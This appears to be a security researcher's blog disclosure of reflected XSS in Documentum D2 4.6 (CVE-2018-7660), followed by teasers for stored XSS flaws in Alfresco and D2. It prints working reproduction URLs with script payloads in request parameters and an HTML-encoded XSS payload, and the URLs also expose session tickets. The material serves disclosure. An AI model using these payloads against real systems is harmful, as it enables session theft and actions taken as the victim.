Reflected XSS in Documentum D2

Documentum D2 version 4.6 is vulnerable to multiple reflected XSS via improper sanitization of error pages.

This bug was reported by Vipin Chaudhary and a CVE ID: CVE-2018-7660 has been assigned to it.

Steps to reproduce:

1. While throwing error pages if an attacker try to add malicious javascript in the URL then it results into Reflected XSS
2. Below URLs are the example for the attack:

http://x.x.x.x:8082/D2/servlet/Download?uid=edms-1519634386637-test_fin_user2-55580492&_docbase=edms&_username=test_fin_user2eyf41%3cscript%3ealert(1)%3c%2fscript%3efr89o&_password=DM_TICKET%3DT0JKIE5VTEwgMAoxMwp2ZXJzaW9uIElOVCBTIDAKMwpmbGFncyBJTlQgUyAwCjkKc2VxdWVuY2VfbnVtIElOVCBTIDAKMjkzMzkKY3JlYXRlX3RpbWUgSU5UIFMgMAoxNTE5NjM0ODYzCmV4cGlyZV90aW1lIElOVCBTIDAKMTUxOTYzNTc2Mwpkb21haW4gU1RSSU5HIFMgMApBIDE1IGFlYWR2c3MwMzAtdGVzdAp1c2VyX25hbWUgU1RSSU5HIFMgMApBIDE3IHRlc3RfZmluX2FwX3VzZXIyCnBhc3N3b3JkIFNUUklORyBTIDAKQSA3NyBETV9FTkNSX1RFWFQ9M3RybnRUc0ZhY0pDMUR5Wk9rWEpicGp2aDZLUkV2TGRaOStTVmlaWEpNNCtnNFhMZHo4dFl6SDB4K0RUOXU2cgpkb2NiYXNlX25hbWUgU1RSSU5HIFMgMApBIDQgZWRtcwpob3N0X25hbWUgU1RSSU5HIFMgMApBIDE1IEFFQURWU1MwMzAtVEVTVApzZXJ2ZXJfbmFtZSBTVFJJTkcgUyAwCkEgNCBlZG1zCnNpZ25hdHVyZV9sZW4gSU5UIFMgMAo3NgpzaWduYXR1cmUgU1RSSU5HIFMgMApBIDc2IGVrZmZzTk9JZERvUTRqWnFXazFkZTNMR1UxRFhvVXJNUjkrZWttUENRcWgzN1poNDJtTUpnMVh2MUFGVTljTkUzcnF0NnVwdk0zYz0K&_locale=en&id=0900271

http://10.20.1.133:8082/D2/servlet/SetFile?uploadFile=start+cmd+%2fk+echo+%250d%250a%2c+World%21&uid=edms-1519634386637-test_fin_user2-55580492&_docbase=edmsj1xxq%3cscript%3ealert(1)%3c%2fscript%3egemzidjhes6me106%3cscript%3ealert(1)%3c%2fscript%3eopktv&_username=test_fin_user2&_password=DM_TICKET%3dT0JKIE5VTEwgMAoxMwp2ZXJzaW9uIElOVCBTIDAKMwpmbGFncyBJTlQgUyAwCjEKc2VxdWVuY2VfbnVtIElOVCBTIDAKMjk0OTMKY3JlYXRlX3RpbWUgSU5UIFMgMAoxNTE5NjQwNDYxCmV4cGlyZV90aW1lIElOVCBTIDAKMTUxOTY0MTM2MQpkb21haW4gU1RSSU5HIFMgMApBIDE1IGFlYWR2c3MwMzAtdGVzdAp1c2VyX25hbWUgU1RSSU5HIFMgMApBIDE3IHRlc3RfZmluX2FwX3VzZXIyCnBhc3N3b3JkIFNUUklORyBTIDAKQSA3NyBETV9FTkNSX1RFWFQ9M3RybnRUc0ZhY0xvMmVaMWxRc3FZK0trallvd2ZPQ0JzK1BEeDFEdlQ3OHpRN2xta2NQQSs3bTRPQldsd0JZegpkb2NiYXNlX25hbWUgU1RSSU5HIFMgMApBIDQgZWRtcwpob3N0X25hbWUgU1RSSU5HIFMgMApBIDE1IEFFQURWU1MwMzAtVEVTVApzZXJ2ZXJfbmFtZSBTVFJJTkcgUyAw

The value of the _docbase request parameter is copied into the HTML document as plain text between tags. The payload pbbux<script>alert(1)</script>ubblj was submitted in the _docbase parameter. It resulted in Reflected XSS.

 PoC:

Comments

Post a Comment

Popular posts from this blog

Image
# Alfresco Stored XSS Vulnerability Blind Stored XSS in Alfresco Enterprise 5.2.4 Description: Alfresco allows users to upload documents that are being saved in the alfresco portal, an attacker can upload a .html with malicious JavaScript which then executes on the Alfresco portal. During the assessment, we were able to execute blind stored cross-site scripting on the Alfresco portal which contains sensitive documents. Risk: A remote attacker can steal the victim’s credentials by sending a keylogger JavaScript. Also, phishing attacks can be performed by changing the content in the .html file which is being executed in the browser. This allows an attacker to perform any action in Alfresco as the logged-in user. Additionally, the following attack scenarios are possible: • By showing a new login screen the user’s credentials can be hijacked. • By adding JavaScript an attacker can redirect a victim to malicious websites. Below is the POC for the Stored Cross-site scripting
Read more
Image
Stored XSS in Documentum D2 Documentum D2 version 4.6 is vulnerable to Stored XSS by HTML encoded value of a XSS payload to bypass the protection. This bug was reported by Vipin Chaudhary and a CVE ID: CVE-2018-7659 has been assigned to it. Steps to reproduce: 1. Login with your credentials in documentum d2 2. Go to import and upload any image file 3. then go to properties and click edit to change the document name 4. Now put &#x22;&#x3e;&#x3c;&#x69;&#x6d;&#x67;&#x20;&#x73;&#x72;&#x63;&#x3d;&#x78;&#x20;&#x6f;&#x6e;&#x65;&#x72;&#x72;&#x6f;&#x72;&#x3d;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29; as the document name which is the HTML encoded value for XSS payload 5. As it gets saved in the portal, it will trigger the Stored XSS. PoC:
Read more